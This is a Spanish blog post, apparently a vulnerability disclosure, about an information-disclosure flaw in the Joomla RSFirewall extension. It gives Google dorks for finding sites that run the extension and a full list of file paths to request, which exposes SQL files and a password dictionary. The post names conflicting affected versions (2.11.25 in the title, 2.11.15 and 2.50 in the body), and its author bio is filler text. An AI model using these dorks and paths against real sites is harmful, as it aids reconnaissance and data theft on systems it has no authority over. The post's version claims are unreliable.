Joomla RSFirewall Components 2.11.25 | Base de datos y divulgación de contraseña

Base de datos y divulgación de contraseña



RSFirewall es una extension de Joomla la cual nos ayuda a proteger nuestro Joomla en contra de ataques e intrusos.

Características principales:
  • Escáner que realiza un seguimiento activo y bloquea cualquier intento de intrusión, como inyección SQL.
  • Si tiene alguna fuga de seguridad, puede establecer el sitio en modo bloqueo.
  • RSFirewall! protege todo el sitio web Joomla!, incluso de las vulnerabilidades de extensiones de terceros.
  • Permite escanear y reparar vulnerabilidades (no son necesarios conocimientos de experto en seguridad).
  • Explora activamente Joomla! archivos sensibles y rechaza los intentos de hackers para cambiarlos.
  • Filtros de cualquier petición, como POST, GET, etc y bloquea los intentos de inyección SQL.
  • Notifica por correo electrónico o incluso por SMS cuando un cierto nivel de alerta se genera.
  • Siempre mantiene informado sobre las actualizaciones de seguridad más recientes.
  • Permite establecer al instalador de extensiones de Joomla! en modo de bloqueo de seguridad, por lo que es imposible que alguien pueda acceder a las áreas protegidas de su sitio web.
  • Protege al usuario administrador de tomas de posesión.
  • Se activa Captcha después de intentos infructuosos de acceso a la administración de Joomla!.
  • Permite establecer un bloqueo de IP por países.

VULNERABILIDAD

RSFirewall en sus versiones 2.11.15 y 2.50 tiene un fallo de seguridad o vulnerabilidad, la cual deja expuesta informacion sensible. Esta informacion sensible consiste en 2 archivos uno de ellos es un archivo .txt llamado "password.txt" el cual contiene una seria de contraseñas, a modo de diccionario.

El segundo archivo .sql el cual tiene diversos nombres como:
  • configuration.data.sql 
  • configuration.sql
  • exceptions.sql 
  • feeds.data.sql 
  • feeds.sql 
  • hashes.data.sql
  • hashes.sql
  • ignored.sql
  • lists.sql
  • logs.sql
  • offenders.sql
Entre otros.

EXPLOTACION 

Para poder explotar esta vulnerabilidad, debemos realizar una busqueda por medio de GoogleHacking con el siguientes dorks:

[*] inurl:''/index.php?option=com_rsfirewall''
[*] inurl:''/administrator/components/com_rsfirewall/''


Una vez identificado un sitio "vulnerable" debemos de probar los siguientes direcciones.
  • /administrator/components/com_rsfirewall/sql/mysql/configuration.data.sql
  • /administrator/components/com_rsfirewall/sql/mysql/configuration.sql 
  • /administrator/components/com_rsfirewall/sql/mysql/exceptions.sql
  • /administrator/components/com_rsfirewall/sql/mysql/feeds.data.sql 
  • /administrator/components/com_rsfirewall/sql/mysql/feeds.sql
  • /administrator/components/com_rsfirewall/sql/mysql/hashes.data.sql
  • /administrator/components/com_rsfirewall/sql/mysql/hashes.sql
  • /administrator/components/com_rsfirewall/sql/mysql/ignored.sql
  • /administrator/components/com_rsfirewall/sql/mysql/lists.sql
  • /administrator/components/com_rsfirewall/sql/mysql/logs.sql
  • /administrator/components/com_rsfirewall/sql/mysql/offenders.sql
  • /administrator/components/com_rsfirewall/sql/mysql/signatures.data.sql
  • /administrator/components/com_rsfirewall/sql/mysql/signatures.sql
  • /administrator/components/com_rsfirewall/sql/mysql/snapshots.sql
  • /administrator/components/com_rsfirewall/sql/mysql/uninstall.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/configuration.data.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/configuration.data.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/configuration.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/exceptions.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/feeds.data.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/feeds.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/hashes.data.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/hashes.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/ignored.sq
  • /administrator/components/com_rsfirewall/sql/sqlazure/lists.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/logs.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/offenders.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/signatures.data.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/signatures.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/snapshots.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/uninstall.sql
  • /administrator/components/com_rsfirewall/assets/dictionary/passwords.txt


Vulnerabilidad descubierta por: KingSkrupellos
INTELMEX
INTELMEX

This is a short biography of the post author. Maecenas nec odio et ante tincidunt tempus donec vitae sapien ut libero venenatis faucibus nullam quis ante maecenas nec odio et ante tincidunt tempus donec.

No hay comentarios.:

Publicar un comentario